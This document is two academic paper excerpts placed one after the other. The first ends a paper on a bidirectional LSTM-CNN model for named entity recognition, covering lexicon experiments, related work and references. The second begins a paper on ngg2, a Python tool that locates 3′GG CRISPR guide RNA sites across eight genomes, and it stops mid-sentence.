compare different sources and matching methods on a BLSTM-CNN model with randomly initialized word embeddings and no 32Wilcoxon rank sum test, p < 0.001. other features or sources of external knowledge. Ta- ble 9 shows the results. In this weakened model, both lexicons contribute significant33 improvements over the baseline. Compared to the SENNA lexicon, our DBpe- dia lexicon is noisier but has broader coverage, which explains why when applying it using the same method as Collobert et al. (2011b), it performs worse on CoNLL-2003 but better on OntoNotes – a dataset containing many more obscure named en- tities. However, we suspect that the method of Col- lobert et al. (2011b) is not noise resistant and there- fore unsuitable for our lexicon because it fails to dis- tinguish exact and partial matches34 and does not set a minimum length for partial matching.35 Instead, when we apply our superior partial matching algo- rithm and BIOES encoding with our DBpedia lex- icon, we gain a significant36 improvement, allow- ing our lexicon to perform similarly to the SENNA lexicon. Unfortunately, as we could not reliably re- move partial entries from the SENNA lexicon, we were unable to investigate whether or not our lexi- con matching method would help in that lexicon. In addition, using both lexicons together as dis- tinct features provides a further improvement37 on CoNLL-2003, which we suspect is because the lexi- 33Wilcoxon rank sum test, p < 0.05 for SENNA-Exact- BIOES, p < 0.005 for all others. 34We achieve this by using BIOES encoding and prioritizing exact matches over partial matches. 35Matching only the first word of a long entry is not very useful; this is not a problem in the SENNA lexicon because 99% of its entries contain only 3 tokens or less. 36Wilcoxon rank sum test, p < 0.001. 37Wilcoxon rank sum test, p < 0.001. 366 Lexicon Matching Encoding CoNLL-2003 OntoNotes No lexicon - - 83.38 (± 0.20) 82.53 (± 0.40) SENNA Exact YN 86.21 (± 0.39) 83.24 (± 0.33) Exact BIOES 86.14 (± 0.48) 83.01 (± 0.52) DBpedia Exact YN 84.93 (± 0.30) 83.15 (± 0.26) Exact BIOES 85.02 (± 0.23) 83.39 (± 0.39) Partial YN 85.72 (± 0.45) 83.25 (± 0.33) Partial BIOES 86.18 (± 0.56) 83.97 (± 0.38) Collobert’s method 85.01 (± 0.31) 83.24 (± 0.26) Both Best combination 87.77 (± 0.29) 83.82 (± 0.19) Table 9: Comparison of lexicon and matching/encoding methods over the BLSTM-CNN model employing random embeddings and no other features. When using both lexicons, the best combination of matching and encoding is Exact-BIOES for SENNA and Partial-BIOES for DBpedia. Note that the SENNA lexicon already contains “partial entries” so exact matching in that case is really just a more primitive form of partial matching. cons are complementary; the SENNA lexicon is rel- atively clean and tailored to newswire, whereas the DBpedia lexicon is noisier but has high coverage. 4.6 Analysis of OntoNotes Performance Table 10 shows the per-genre breakdown of the OntoNotes results. As expected, our model per- forms best on clean text like broadcast news (BN) and newswire (NW), and worst on noisy text like telephone conversation (TC) and Web text (WB). Our model also substantially improves over previous work on all genres except TC, where the small size of the training data likely hinders learning. Finally, the performance characteristics of our model appear to be quite different than the previous CRF mod- els (Finkel and Manning, 2009; Durrett and Klein, 2014), likely because we apply a completely differ- ent machine learning method. 5 Related Research Named entity recognition is a task with a long his- tory. In this section, we summarize the works we compare with and that influenced our approach. 5.1 Named Entity Recognition Most recent approaches to NER have been charac- terized by the use of CRF, SVM, and perceptron models, where performance is heavily dependent on feature engineering. Ratinov and Roth (2009) used non-local features, a gazetteer extracted from 38We downloaded their publicly released software and model to perform the per-genre evaluation. Wikipedia, and Brown-cluster-like word representa- tions, and achieved an F1 score of 90.80 on CoNLL- 2003. Lin and Wu (2009) surpassed them without using a gazetteer by instead using phrase features obtained by performing k-means clustering over a private database of search engine query logs. Passos et al. (2014) obtained nearly the same performance using only public data by training phrase vectors in their lexicon-infused skip-gram model. In order to combat the problem of sparse features, Suzuki et al. (2011) employed large-scale unlabelled data to per- form feature reduction and achieved an F1 score of 91.02 on CoNLL-2003, which is the current state of the art for systems without external knowledge. Training an NER system together with related tasks such as entity linking has recently been shown to improve the state of the art. Durrett and Klein (2014) combined coreference resolution, entity link- ing, and NER into a single CRF model and added cross-task interaction factors. Their system achieved state of the art results on the OntoNotes dataset, but they did not evaluate on the CoNLL-2003 dataset due to lack of coreference annotations. Luo et al. (2015) achieved state of the art results on CoNLL- 2003 by training a joint model over the NER and entity linking tasks, the pair of tasks whose inter- dependencies contributed the most to the work of Durrett and Klein (2014). 5.2 NER with Neural Networks While many approaches involve CRF models, there has also been a long history of research involving neural networks. Early attempts were hindered by 367 Model BC BN MZ NW TC WB Test set size (# tokens) 32,576 23,557 18,260 51,667 11,015 19,348 Test set size (# entities) 1,697 2,184 1,163 4,696 380 1,137 Finkel and Manning (2009) 78.66 87.29 82.45 85.50 67.27 72.56 Durrett and Klein (2014)38 78.88 87.39 82.46 87.60 72.68 76.17 BLSTM-CNN 81.26 86.87 79.94 85.27 67.82 72.11 BLSTM-CNN + emb 85.05 89.93 84.31 88.35 72.44 77.90 BLSTM-CNN + emb + lex 85.23 89.93 84.45 88.39 72.39 78.38 Table 10: Per genre F1 scores on OntoNotes. BC = broadcast conversation, BN = broadcast news, MZ = magazine, NW = newswire, TC = telephone conversation, WB = blogs and newsgroups lack of computational power, scalable learning algo- rithms, and high quality word embeddings. Petasis et al. (2000) used a feed-forward neural network with one hidden layer on NER and achieved state-of-the-art results on the MUC6 dataset. Their approach used only POS tag and gazetteer tags for each word, with no word embeddings. Hammerton (2003) attempted NER with a single- direction LSTM network and a combination of word vectors trained using self-organizing maps and con- text vectors obtained using principle component analysis. However, while our method optimizes log- likelihood and uses softmax, they used a different output encoding and optimized an unspecified ob- jective function. Hammerton’s (2003) reported re- sults were only slightly above baseline models. Much later, with the advent of neural word embeddings, Collobert et al. (2011b) presented SENNA, which employs a deep FFNN and word embeddings to achieve near state of the art results on POS tagging, chunking, NER, and SRL. We build on their approach, sharing the word embeddings, fea- ture encoding method, and objective functions. Recently, Santos et al. (2015) presented their CharWNN network, which augments the neural net- work of Collobert et al. (2011b) with character level CNNs, and they reported improved performance on Spanish and Portuguese NER. We have successfully incorporated character-level CNNs into our model. There have been various other similar architec- ture proposed for various sequential labeling NLP tasks. Huang et al. (2015) used a BLSTM for the POS-tagging, chunking, and NER tasks, but they employed heavy feature engineering instead of using a CNN to automatically extract character- level features. Labeau et al. (2015) used a BRNN with character-level CNNs to perform German POS- tagging; our model differs in that we use the more powerful LSTM unit, which we found to perform better than RNNs in preliminary experiments, and that we employ word embeddings, which is much more important in NER than in POS tagging. Ling et al. (2015) used both word- and character-level BLSTMs to establish the current state of the art for English POS tagging. While using BLSTMs in- stead of CNNs allows extraction of more sophisti- cated character-level features, we found in prelim- inary experiments that for NER it did not perform significantly better than CNNs and was substantially more computationally expensive to train. 6 Conclusion We have shown that our neural network model, which incorporates a bidirectional LSTM and a character-level CNN and which benefits from robust training through dropout, achieves state-of-the-art results in named entity recognition with little feature engineering. Our model improves over previous best reported results on two major datasets for NER, sug- gesting that the model is capable of learning com- plex relationships from large amounts of data. Preliminary evaluation of our partial matching lexicon algorithm suggests that performance could be further improved through more flexible appli- cation of existing lexicons. Evaluation of existing word embeddings suggests that the domain of train- ing data is as important as the training algorithm. More effective construction and application of lexicons and word embeddings are areas that require more research. In the future, we would also like to extend our model to perform similar tasks such as extended tagset NER and entity linking. 368 Acknowledgments This research was supported by Honda Research In- stitute Japan Co., Ltd. The authors would like to thank Collobert et al. (2011b) for releasing SENNA with its word vectors and lexicon, the torch7 frame- work contributors, and Andrey Karpathy for the ref- erence LSTM implementation. References Sören Auer, Christian Bizer, Georgi Kobilarov, Jens Lehmann, Richard Cyganiak, and Zachary Ives. 2007. DBpedia: A nucleus for a web of open data. In The semantic web, pages 722–735. Springer. Phil Blunsom, Edward Grefenstette, Nal Kalchbrenner, et al. 2014. A convolutional neural network for mod- elling sentences. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguis- tics. Association for Computational Linguistics. Kyunghyun Cho, Bart van Merriënboer, Dzmitry Bah- danau, and Yoshua Bengio. 2014. On the proper- ties of neural machine translation: Encoder-decoder approaches. In Proceedings of SSST-8, Eighth Work- shop on Syntax, Semantics and Structure in Statistical Translation, pages 103–111. Association for Compu- tational Linguistics. Marc Claesen, Jaak Simm, Dusan Popovic, Yves Moreau, and Bart De Moor. Easy hyperparameter search using Optunity. In Proceedings of the Interna- tional Workshop on Technical Computing for Machine Learning and Mathematical Engineering. Maurice Clerc and James Kennedy. 2002. The particle swarm-explosion, stability, and convergence in a mul- tidimensional complex space. Evolutionary Computa- tion, IEEE Transactions on, 6(1):58–73. Ronan Collobert and Jason Weston. 2008. A unified ar- chitecture for natural language processing: Deep neu- ral networks with multitask learning. In Proceed- ings of the 25th International Conference on Machine Learning, pages 160–167. ACM. Ronan Collobert, Koray Kavukcuoglu, and Clément Farabet. 2011a. Torch7: A Matlab-like environment for machine learning. In Proceedings of BigLearn, NIPS Workshop, number EPFL-CONF-192376. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011b. Natural language processing (almost) from scratch. The Journal of Machine Learning Research, 12:2493– 2537. Greg Durrett and Dan Klein. 2014. A joint model for en- tity analysis: Coreference, typing, and linking. Trans- actions of the Association for Computational Linguis- tics, 2:477–490. Jenny Rose Finkel and Christopher D Manning. 2009. Joint parsing and named entity recognition. In Pro- ceedings of Human Language Technologies: The 2009 Annual Conference of the North American Chapter of the Association for Computational Linguistics, pages 326–334. Association for Computational Linguistics. Felix A Gers, Jürgen Schmidhuber, and Fred Cummins. 2000. Learning to forget: Continual prediction with LSTM. Neural Computation, 12(10):2451–2471. Christoph Goller and Andreas Kuchler. 1996. Learning task-dependent distributed representations by back- propagation through structure. In Neural Networks, 1996., IEEE International Conference on, volume 1, pages 347–352. IEEE. Alan Graves, Abdel-rahman Mohamed, and Geoffrey Hinton. 2013. Speech recognition with deep recurrent neural networks. In Proceedings of the 2013 IEEE In- ternational Conference on Acoustics, Speech and Sig- nal Processing, pages 6645–6649. James Hammerton. 2003. Named entity recognition with long short-term memory. In Proceedings of the Seventh Conference on Natural Language Learning at HLT-NAACL 2003, pages 172–175. Association for Computational Linguistics. Geoffrey Hinton, Nitish Srivastava, and Kevin Swersky. 2012. Lecture 6e: RMSProp: divide the gradient by a running average of its recent magnitude. In Neural Networks for Machine Learning. http: //www.cs.toronto.edu/˜tijmen/csc321/ slides/lecture_slides_lec6.pdf. Eduard Hovy, Mitchell Marcus, Martha Palmer, Lance Ramshaw, and Ralph Weischedel. 2006. OntoNotes: the 90% solution. In Proceedings of the Human Lan- guage Technology Conference of the NAACL, Com- panion Volume: Short Papers, pages 57–60. Associ- ation for Computational Linguistics. Zhiheng Huang, Wei Xu, and Kai Yu. 2015. Bidi- rectional LSTM-CRF models for sequence tagging. CoRR, abs/1508.01991. Matthieu Labeau, Kevin Löser, and Alexandre Allauzen. 2015. Non-lexical neural architecture for fine-grained POS tagging. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Process- ing, pages 232–237. Association for Computational Linguistics. Dekang Lin and Xiaoyun Wu. 2009. Phrase clustering for discriminative learning. In Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natu- ral Language Processing of the AFNLP, pages 1030– 1038. Association for Computational Linguistics. 369 http://www.cs.toronto.edu/~tijmen/csc321/slides/lecture_slides_lec6.pdf http://www.cs.toronto.edu/~tijmen/csc321/slides/lecture_slides_lec6.pdf http://www.cs.toronto.edu/~tijmen/csc321/slides/lecture_slides_lec6.pdf Wang Ling, Chris Dyer, Alan W Black, Isabel Trancoso, Ramon Fermandez, Silvio Amir, Luis Marujo, and Tiago Luis. 2015. Finding function in form: Com- positional character models for open vocabulary word representation. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Process- ing, pages 1520–1530. Association for Computational Linguistics. Gang Luo, Xiaojiang Huang, Chin-Yew Lin, and Za- iqing Nie. 2015. Joint entity recognition and disam- biguation. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 879–888. Association for Computational Lin- guistics. Tomas Mikolov, Stefan Kombrink, Anoop Deoras, Lukar Burget, and Jan Cernocky. 2011. RNNLM-recurrent neural network language modeling toolkit. In Pro- ceedings of the 2011 ASRU Workshop, pages 196–201. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S Cor- rado, and Jeff Dean. 2013. Distributed representa- tions of words and phrases and their compositionality. In Proceedings of the Twenty-seventh Annual Confer- ence on Advances in Neural Information Processing Systems, pages 3111–3119. Yurii Nesterov. 1983. A method of solving a convex pro- gramming problem with convergence rate O(1/k2). Soviet Mathematics Doklady, 27(2):372–376. Alexandre Passos, Vineet Kumar, and Andrew McCal- lum. 2014. Lexicon infused phrase embeddings for named entity resolution. In Proceedings of the Eigh- teenth Conference on Computational Natural Lan- guage Learning, pages 78–86. Association for Com- putational Linguistics. Jeffrey Pennington, Richard Socher, and Christopher D Manning. 2014. GloVe: Global vectors for word rep- resentation. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, pages 1532–1543. G Petasis, S Petridis, G Paliouras, V Karkaletsis, SJ Perantonis, and CD Spyropoulos. 2000. Symbolic and neural learning for named-entity recognition. In Proceedings of the Symposium on Computational In- telligence and Learning, pages 58–66. Citeseer. Vu Pham, Théodore Bluche, Christopher Kermorvant, and Jérôme Louradour. 2014. Dropout improves re- current neural networks for handwriting recognition. In Proceedings of the 14th International Conference on Frontiers in Handwriting Recognition, pages 285– 290. IEEE. Sameer Pradhan, Alessandro Moschitti, Nianwen Xue, Hwee Tou Ng, Anders Björkelund, Olga Uryupina, Yuchen Zhang, and Zhi Zhong. 2013. Towards robust linguistic analysis using OntoNotes. In Proceedings of the Seventeenth Conference on Computational Nat- ural Language Learning, pages 143–152. Association for Computational Linguistics. Lev Ratinov and Dan Roth. 2009. Design challenges and misconceptions in named entity recognition. In Proceedings of the Thirteenth Conference on Compu- tational Natural Language Learning, pages 147–155. Association for Computational Linguistics. David Rumelhart, Geoffrey Hinton, and Ronald Williams. 1986. Learning representations by back-propagating errors. Nature, pages 323–533. Cıcero Santos, Victor Guimaraes, RJ Niterói, and Rio de Janeiro. 2015. Boosting named entity recognition with neural character embeddings. In Proceedings of the Fifth Named Entities Workshop, pages 25–33. Jun Suzuki, Hideki Isozaki, and Masaaki Nagata. 2011. Learning condensed feature representations from large unsupervised data sets for supervised learning. In Pro- ceedings of the 49th Annual Meeting of the Associa- tion for Computational Linguistics: Human Language Technologies: Short Papers, pages 636–641. Associa- tion for Computational Linguistics. Erik F Tjong Kim Sang and Fien De Meulder. 2003. In- troduction to the CoNLL-2003 shared task: Language- independent named entity recognition. In Proceed- ings of the Seventh Conference on Natural Language Learning at HLT-NAACL 2003, pages 142–147. Asso- ciation for Computational Linguistics. Joseph Turian, Lev Ratinov, and Yoshua Bengio. 2010. Word representations: a simple and general method for semi-supervised learning. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 384–394. Association for Computa- tional Linguistics. Matthew D. Zeiler. 2012. ADADELTA: an adaptive learning rate method. CoRR, abs/1212.5701. 370 work_6got5qjl3jemrgxkocpfbmmzvq ---- Identification of high-efficiency 3'GG gRNA motifs in indexed FASTA files with ngg2 Submitted 9 April 2015 Accepted 29 October 2015 Published 18 November 2015 Corresponding author Elisha D. Roberson, eroberso@dom.wustl.edu Academic editor Kjiersten Fagnan Additional Information and Declarations can be found on page 9 DOI 10.7717/peerj-cs.33 Copyright 2015 Roberson Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Identification of high-efficiency 3′GG gRNA motifs in indexed FASTA files with ngg2 Elisha D. Roberson Departments of Medicine & Genetics, Division of Rheumatology, Washington University in Saint Louis, Saint Louis, MO, United States of America ABSTRACT CRISPR/Cas9 is emerging as one of the most-used methods of genome modification in organisms ranging from bacteria to human cells. However, the efficiency of editing varies tremendously site-to-site. A recent report identified a novel motif, called the 3′GG motif, which substantially increases the efficiency of editing at all sites tested in C. elegans. Furthermore, they highlighted that previously published gRNAs with high editing efficiency also had this motif. I designed a Python command-line tool, ngg2, to identify 3′GG gRNA sites from indexed FASTA files. As a proof-of-concept, I screened for these motifs in six model genomes: Saccharomyces cerevisiae, Caenorhabditis elegans, Drosophila melanogaster, Danio rerio, Mus musculus, and Homo sapiens. I also scanned the genomes of pig (Sus scrofa) and African elephant (Loxodonta africana) to demonstrate the utility in non-model organisms. I identified more than 60 million single match 3′GG motifs in these genomes. Greater than 61% of all protein coding genes in the reference genomes had at least one unique 3′GG gRNA site overlapping an exon. In particular, more than 96% of mouse and 93% of human protein coding genes have at least one unique, overlapping 3′GG gRNA. These identified sites can be used as a starting point in gRNA selection, and the ngg2 tool provides an important ability to identify 3′GG editing sites in any species with an available genome sequence. Subjects Bioinformatics, Computational Biology, Data Science, Databases Keywords gRNA, Motif discovery, Python, Open-source, CRISPR/Cas9, 3′GG INTRODUCTION Genome engineering allows for the targeted deletion or modification by homology directed repair of a target locus. Currently, one of the most popular methods for genome manipulation is the clustered regularly interspaced short palindromic repeat (CRISPR)/CRISPR associated protein 9 (Cas9) system adapted from Streptococcus pyogenes. The S. pyogenes CRISPR/Cas system was initially thought to represent a novel DNA repair mechanism, but was eventually found to provide heritable bacterial immunity to invading exogenous DNA, such as plasmids and bacteriophages (Barrangou et al., 2007; Makarova et al., 2006). During endogenous CRISPR/Cas9 function, foreign DNA integrates into the CRISPR locus. The bacterial cell then expresses the pre-CRISPR RNA (crRNA) and a trans-activating crRNA (tracrRNA) that pair to form a complex that How to cite this article Roberson (2015), Identification of high-efficiency 3′GG gRNA motifs in indexed FASTA files with ngg2. PeerJ Comput. Sci. 1:e33; DOI 10.7717/peerj-cs.33 mailto:eroberso@dom.wustl.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.33 http://dx.doi.org/10.7717/peerj-cs.33 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.33 is cleaved by RNAse III (Deltcheva et al., 2011). The resulting RNA is a hybrid of the pre-crRNA and the tracrRNA, and includes a 20 bp guide RNA (gRNA) sequence. The gRNA is incorporated into Cas9 and can then guide the cleavage of a complementary DNA sequence by the nuclease activity of the Cas9 protein. The topic of CRISPR-Cas genome editing has been reviewed extensively elsewhere (Doudna & Charpentier, 2014; Hsu, Lander & Zhang, 2014; Jiang & Doudna, 2015; Mali, Esvelt & Church, 2013). Codon-optimized versions of Cas9 are available for a wide range of organisms, and can easily be synthesized if it is not already available. Transfecting cells with Cas9 plasmid along with a fused crRNA-tracrRNA hybrid construct called a single-guide RNA (sgRNA) allows for temporary activity of Cas9. Alternatively, cells can also be transfected with a Cas9 protein preloaded with a gRNA to reduce off target effects (Kim et al., 2014). Keeping a stock of plasmids with a sgRNA backbone minus the gRNA site makes it easy to quickly generate new sgRNA plasmids by site-directed mutagenesis. The Cas9 protein loaded with the sgRNA will bind to sites complementary genomic loci, but will only cut it if a protospacer adjacent motif (PAM) site immediately follows the complementary sequence (Mojica et al., 2009). The PAM site for the commonly-used Streptococcus pyogenes type-II CRISPR is an NGG motif. Therefore, a S. pyogenes Cas9 gRNA site can be defined as N20NGG. It is important to note that constitutively expressed sgRNAs typically use a U6 snRNA promoter that strongly prefers a G starting base. For U6 compatibility, sequences starting with A, C, or T may be used if they are cloned into a sgRNA vector with an appended G base, resulting in a 21 bp gRNA (Farboud & Meyer, 2015; Ran et al., 2013b), or by incorporating the gRNA into a tRNA poly-cistron and taking advantage of tRNA processing cleavage (Xie, Minkenberg & Yang, 2015). I will refer to the subset gRNA sites contain a starting G base (GN19NGG) as canonical 3 ′GG gRNA sites. The rate of editing using the CRISPR/Cas9 system is far higher than homologous recombination, but higher efficiency is still desirable. The introduction of a longer stem in part the sgRNA stem-loop structure and the flip of a single A in a polyA track of a separate sgRNA stem-loop, called the flip + extension (F + E) sgRNA design, resulted in increased Cas9 editing efficiency (Chen et al., 2013). Recently, another improvement was reported that increases efficiency. gRNA sites with a GG motif adjacent to the PAM site, called 3′GG gRNAs, have far higher activity than equivalent gRNA sites in the same region (Farboud & Meyer, 2015). These sites take the form of N18GGNGG. The 3 ′GG motif efficiency in species other than C. elegans is unknown. Tools already exist to identify S. pyogenes Cas9 gRNA targets in sequences via a web interface for an input DNA, or for common model organisms (Gratz et al., 2014; Heigwer, Kerr & Boutros, 2014; Liu et al., 2015; Montague et al., 2014; Naito et al., 2015; Stemmer et al., 2015; Xiao et al., 2014). However, there are limitations to these methods. Searching a whole genome for gRNA sites is not feasible via a web interface unless the genome is exceptionally small. There is already support for most model organisms, but leaves individuals working on less commonly studied species without a resource. In this manuscript, I report a Python command-line tool, ngg2, for identification of 3′GG gRNA motifs from indexed FASTA genome files. As a proof of concept, I report all 3′GG gRNA Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 2/11 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.33 motifs in 6 model species plus two additional mammalian genomes, identifying more than 88 million sites, of which more than 60 million are unique matches within the reference genome for that species. More than 83% of all protein coding genes in 7/8 species have at least one unique 3′GG gRNA overlapping it for potential editing. MATERIALS & METHODS ngg2 motif identification I designed ngg2 using Python with compiled regular expressions for the 3′GG gRNA plus PAM motif. The use of compiled regular expressions makes the search quite efficient even for relatively large genomes. This tool is Python based, relying on the Python base functions and some external dependencies, such as the regex and pyfaidx packages. ngg2 uses the FASTA index via pyfaidx (Shirley et al., 2015) to directly seek the genomic target without reading the entire file. The default mode scrapes the entire FASTA input for 3′GG gRNA sites, but individual contigs or contig regions can be specified instead. ngg2 identifies these sites on both the sense and antisense strands independently for each chromosome, facilitating multiprocessing to decrease computation time. ngg2 buffers all detected gRNA sites in memory, and then identifies uniqueness by storing the gRNA sites in a dictionary. This means that all unique sites will be appropriately flagged, but near matches, i.e., single-base mismatches will not. The output from this tool could be pipelined with other tools, or further extended with BioPython to allow for identification of near matches as they are beyond the scope of this tool. The output can be extended to include non-canonical sites starting with any base. ngg2 output includes the contig name, start and end positions, the gRNA sequence, the PAM sequence, whether the site starts with a G, and whether the gRNA sequence was unique in the searched region. For a whole-genome this is very handy, but be aware that selecting only a small region will only tell you if a gRNA is unique within the region, not the genome. The source code for ngg2 is available from GitHub. Multi-species site identification I used ngg2 to identify all 3′GG gRNA motifs 6 commonly studied organisms and two others: Saccharomyces cerevisiae, Caenorhabditis elegans, Drosophila melanogaster, Danio rerio, Mus musculus, Homo sapiens, Sus scrofa, and Loxodonta africana. I used a GNU Make script to download genomes and GTF gene annotations, calculate genome GC content, and annotate genes in R to enable reproducibility. The Makefile downloads the top-level or primary assembly genomes from Ensembl Release 79, runs ngg2 on all contigs for each FASTA file, and calculates GC content for each genome. I based the GC content of each genome from non-N base content. After identifying gRNA sites, I used R, particularly relying on the plyr, dplyr, tidyr, magrittr, GenomicRanges, and GenomicFeatures packages, to identify the overlap of each gRNA with gene exons and tabulate the number of genes overlapping at least one gRNA (Lawrence et al., 2013; R Core Team, 2014). A gRNA was considered overlapping a gene if at least one base of gRNA sequence overlapped at least one base of exonic sequence. The best Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 3/11 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.33 Table 1 Count of gRNA classes in each species. All N18GGNGG motifs are included in the ‘All gRNAs’ section, while only canonical gRNAs starting with a G are in the ‘Canonical gRNAs’ section. The ‘All’ class accumulates all matching motifs for that section, while the ‘Unique’ class counts only sites with on exact match in the reference genome. All gRNAs Canonical gRNAs All Unique All Unique S. cerevisiae 44,757 41,462 9,938 9,717 C. elegans 379,955 333,752 85,887 82,696 D. melanogaster 929,164 815,501 243,705 238,460 D. rerio 5,815,459 3,110,150 835,035 744,702 M. musculus 19,368,938 13,925,626 3,856,020 3,660,550 S. scrofa 18,711,809 12,716,221 4,145,116 3,558,512 H. sapiens 23,022,656 14,782,453 4,172,179 3,954,608 L. africana 20,276,122 14,929,328 4,075,522 3,893,752 Total 88,548,860 60,654,493 17,423,402 16,142,997 case puts the cut site within the exon body and should certainly disrupt the gene. The worst case of a 1bp overlap cutting in an intron should still generate indels big enough to extend into the exon or to delete a canonical splice site. I calculated all summary statistics and generated ggplot2 figures using RStudio (v0.98.1102) Markdown with knitr (Xie, 2013). RESULTS 3′GG gRNA sites are common in each species Overall, I identified greater than 88 million 3′GG gRNA sites in the tested genomes (Table 1). Some of these gRNA sequences were not unique in a given genome, leaving more than 60 million unique 3′GG sites. Approximately 16 million of the 60 million unique sites were canonical G starting motifs. The sites identified in each species with the gRNA sequence, PAM sequence, genome coordinates, annotated overlapping genes, and number of perfect genome matches are available for download (Roberson, 2015). The R scripts, Python files, and Make files are also available in a public repository for reproducibility. The genomes I analyzed had vastly different sizes, ranging from approximately 12 Mb for yeast to greater than 3 Gb for humans and elephants, and as a result had dramatically different numbers of 3′GG gRNA sites per genome. Therefore, I also assessed the site density per megabase of reference genome size (Table 2). Unique sites with a G starting base averaged a density of 1,218 sites/Mb, or 1 site per 821 bp. All unique sites averaged 4,210 sites/Mb, or 1 unique 3′GG gRNA site per 238 bp. D. rerio had the lowest density at 527 unique G-start sites/Mb, while D. melanogaster had the highest density at 1,659 unique sites/Mb. The low density of unique sites in zebrafish may be due to genome complexity from previous duplication events I profiled the performance of canonical G-start gRNA searches in each of the tested genomes for both block and exhaustive scans using both 1 and 10 CPUs (Table 3). The parallelization in this program is by contig and strand, so the maximum utilized number Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 4/11 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.33 Table 2 3′GG gRNA sites per megabase genome size. Reference genome size was determined from the species FASTA index. The number of unique 3′GG gRNA sites in the genomes is encouraging, with an average across all species of one unique site per kb of genome. All gRNAs Canonical gRNAs All Unique All Unique S. cerevisiae 3,681.55 3,410.52 817.46 799.29 C. elegans 3,788.70 3,327.99 856.42 824.60 D. melanogaster 6,464.83 5,674.00 1,695.62 1,659.13 D. rerio 4,117.24 2,201.93 591.19 527.24 M. musculus 7,092.58 5,099.33 1,412.01 1,340.43 S. scrofa 6,662.50 4,527.72 1,475.90 1,267.04 H. sapiens 7,427.26 4,768.92 1,345.97 1,275.78 L. africana 6,342.71 4,670.14 1,274.89 1,218.03 Table 3 Run times with one and multiple CPUs. Profiling was performed using Python v2.7.3 using 1 or 10 processors on a server with Intel i7-3930K processors and 32 GB of RAM. Canonical gRNAs were searched for benchmark purposes. When possible, it is clearly advantageous to use multiple processors to accelerate gRNA searches. Block Exhaustive 1 CPU 10 CPU Delta 1 CPU 10 CPU Delta Saccharomyces cerevisiae 0.9 0.3 −71% 1.2 0.4 −68% Caenorhabditis elegans 6.4 1.4 −78% 8.1 2.1 −74% Drosophila melanogaster 67.8 12.7 −81% 71.7 13.6 −81% Danio rerio 99.3 20.3 −80% 138.2 26.8 −81% Mus musculus 186.0 47.7 −74% 284.1 66.6 −77% Sus scrofa 536.4 111.1 −79% 633.2 126.7 −80% Homo sapiens 207.4 53.9 −74% 306.2 71.6 −77% Loxodonta africana 293.4 64.8 −78% 398.3 79.9 −80% of threads would be twice the number of contigs. Using 10 CPUs reduced runtimes by approximately 70–80% in all cases. It is worth noting that exhaustively scraping the human genome for canonical sites took only 71.6 s with 10 CPUs, and even the longest search took only 126.7 s for Sus scrofa using 10 CPUs. Little strand bias observed for canonical 3′GG gRNA sites The strand of each gRNA site with respect to the reference was included in the ngg2 output files. For each organism, I considered every gRNA site as an independent Bernoulli trial with a 50% probability of a “Sense” strand designation as a successful trial outcome (Table 4). 5/8 species showed strand bias for all gRNA sites (C. elegans, D. melanogaster, D. rerio, H. sapiens, L. africana). Only C. elegans and H. sapiens demonstrated strand bias significantly different from the expected ratio for canonical 3′GG sites. While the difference in strand selection is significant, it may be unimportant to editing site selection. Wildtype Cas9 cleaves both DNA strands simultaneously, and therefore the strand of the target Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 5/11 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.33 Table 4 Strand bias for gRNA sites. The gRNA type is either all 3′GG sites or only canonical G starting gRNA sites. The estimate column is the estimated rate of positive strand selection observed. The p-value column is detected for whether the Bernoulli trial estimates differ significantly a 50/50 strand selection, and the adjusted p-value is based on a Benjamini–Hochberg false-discovery rate correction. gRNA type Species Estimate p. value p. adj All Saccharomyces cerevisiae 0.500 9.02E−01 1.00E+00 Caenorhabditis elegans 0.494 9.09E−12 1.36E−10 Drosophila melanogaster 0.498 8.86E−06 9.75E−05 Danio rerio 0.501 6.22E−04 6.22E−03 Mus musculus 0.500 6.52E−01 1.00E+00 Homo sapiens 0.501 9.59E−19 1.53E−17 Loxodonta africana 0.499 4.02E−06 4.83E−05 Sus scrofa 0.500 4.88E−01 1.00E+00 Canonical Saccharomyces cerevisiae 0.501 8.00E−01 1.00E+00 Caenorhabditis elegans 0.490 1.50E−10 2.10E−09 Drosophila melanogaster 0.500 6.09E−01 1.00E+00 Danio rerio 0.501 9.30E−02 7.44E−01 Mus musculus 0.500 4.57E−02 4.11E−01 Homo sapiens 0.501 2.01E−06 2.62E−05 Loxodonta africana 0.500 9.11E−01 1.00E+00 Sus scrofa 0.500 4.45E−01 1.00E+00 sequence doesn’t matter. Strategies that employ dual nickases to reduce off target effects could be affected by such bias, as they require two separate gRNA sites on opposite strands (Ran et al., 2013a). The difference observed is less than 0.6% different from expected 50% ratio, and whether this functionally affects the ability to choose paired 3′GG gRNAs remains to be seen. CGG & GGG PAM sites are underrepresented I visualized the distribution of the four PAM sites (AGG, CGG, GGG, TGG) as a stacked bar chart of each sites proportion of the total identified sites in each species (Fig. 1). In general, the AGG and TGG sites represented the majority of 3′GG gRNA sites in all species. I tested whether PAM site distribution differed from chance based on the GC content of the reference genome. For each species, I considered each PAM site a Bernoulli trial, and defined success as either CGG or GGG site identity. The probability of success was set equal to the estimated genome-wide GC content calculated from the reference genome, 